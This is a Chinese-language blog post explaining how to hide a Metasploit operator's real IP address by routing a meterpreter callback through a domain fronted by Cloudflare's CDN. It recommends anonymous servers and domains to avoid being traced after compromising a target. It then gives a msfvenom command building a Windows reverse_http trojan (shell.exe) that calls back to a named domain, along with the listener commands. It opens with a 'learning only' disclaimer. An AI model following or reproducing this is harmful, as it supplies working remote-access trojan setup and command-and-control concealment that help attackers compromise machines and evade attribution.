当前位置:网站首页>Metasploit-域名上线隐藏IP
Metasploit-域名上线隐藏IP
2022-08-04 23:49:00 【曲折上升】
仅供学习使用,请勿用于非法途径,后果自负
Metasploit域名上线隐藏IP
概述
为什么要隐藏IP?
在拿下了目标机之后,目标机在内网里面,使用msf或者CS时,用自己的VPS做服务器的话,导致很容易被溯源。
域名上线原理
当我们访问域名时会经过域名解析 域名解析就是域名到IP地址的转换过程,那么就意味这我们访问域名实际上最后是访问的真实IP。
A记录: 将域名指向一个IPv4地址(例如:100.100.100.100),需要增加A记录。
CNAME记录: 如果将域名指向一个域名,实现与被指向域名相同的访问效果,需要增加CNAME记录。这个域名一般是主机服务商提供的一个域名。
MX记录: 建立电子邮箱服务,将指向邮件服务器地址,需要设置MX记录。建立邮箱时,一般会根据邮箱服务商提供的MX记录填写此记录。
NS记录: 域名解析服务器记录,如果要将子域名指定某个域名服务器来解析,需要设置NS记录。
TXT记录: 可任意填写,可为空。一般做一些验证记录时会使用此项,如:做SPF(反垃圾邮件)记录。
AAAA记录: 将主机名(或域名)指向一个IPv6地址(例如:ff03:0:0:0:0:0:0:c1),需要添加AAAA记录。
通过CDN上线MSF
CDN的全称是Content Delivery Network,即内容分发网络。其目的是通过在现有的Internet中增加一层新的CACHE(缓存)层,将网站的内容发布到最接近用户的网络”边缘“的节点,目的提高用户访问网站的速度。
CDN上线具体实现
基础配置:一台VPS、一个域名,这里的VPS最好是匿名的
既然是隐藏自身 那么域名肯定不能使用自己备案的域名
https://freenom.com/ 注册免费域名 注册失败,可以用gmail注册
https://cart.godaddy.com/ 注册匿名域名
https://www.cloudflare.com/ 免费CDN
购买好域名之后,进入cloudflare.com添加域名。
添加A记录。
返回https://cart.godaddy.com/进行入门指南的设置。
将所有的开关都关闭。编辑名称服务器,设置为cloudflare.com的名称服务器。
点击改变检查是否配置成功。
ping下该域名,查看是否为vps的IP地址,不是的话则配置成功。
配置成功。
- MSF生成木马
msfvenom -p windows/x64/meterpreter/reverse_http LHOST=www.zsyyme.info LPORT=2095 -f exe -o shell.exe
- MSF开启相对应监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set lhost www.zsyyme.info
set lport 2095
run
- 用wireshark抓取流量即可!
边栏推荐
- .net (C#) get year month day between two dates
- 【LeetCode】Summary of Two Pointer Problems
- 【云原生--Kubernetes】调度约束
- Cython
- MVCC是什么
- The role of @Async annotation and how to implement asynchronous listening mechanism
- @Async注解的作用以及如何实现异步监听机制
- 没有这些「伪需求」,产品经理的 KPI 怎么完成?
- 3年,从3K涨薪到20k?真是麻雀啄了牛屁股 — 雀食牛逼呀
- 小黑leetcode冲浪:94. 二叉树的中序遍历
猜你喜欢
uniapp 分享功能-分享给朋友群聊朋友圈效果(整理)
Nuclei (2) Advanced - In-depth understanding of workflows, Matchers and Extractors
Xiaohei leetcode surfing: 94. Inorder traversal of binary tree
golang 协程的实现原理
The market value of 360 has evaporated by 390 billion in four years. Can government and enterprise security save lives?
Statistical words (DAY 101) Huazhong University of Science and Technology postgraduate examination questions
【LeetCode】双指针题解汇总
jenkins发送邮件系统配置
Ab3d.PowerToys and Ab3d.DXEngine Crack
First, the basic concept of reptiles
随机推荐
安全软件 Avast 与赛门铁克诺顿 NortonLifeLock 合并案获英国批准,市值暴涨 43%
【CVA估值训练营】财务建模指南——第一讲
MySQL增删改查基础
Xiaohei's leetcode journey: 95. Longest substring with at least K repeating characters
情侣牵手[贪心 & 抽象]
407. 接雨水 II
对“为什么一些程序员很傲慢”的解读
956. 最高的广告牌
【云原生--Kubernetes】Pod控制器
2022 Niu Ke Summer Multi-School Training Camp 5 (BCDFGHK)
OpenCV:10特征检测
从单体架构迁移到 CQRS 后,我觉得 DDD 并不可怕
【数据挖掘概论】数据挖掘的简单描述
Mathematical Principles of Matrix
PZK学C语言之字符串函数(一)
招标公告 | 海纳百创公众号运维项目
工业物联网 —— 新型数据库的召唤
上课笔记(6)(2)——#742. 周末舞会
ClickHouse 二级索引
什么是次世代建模(附学习资料)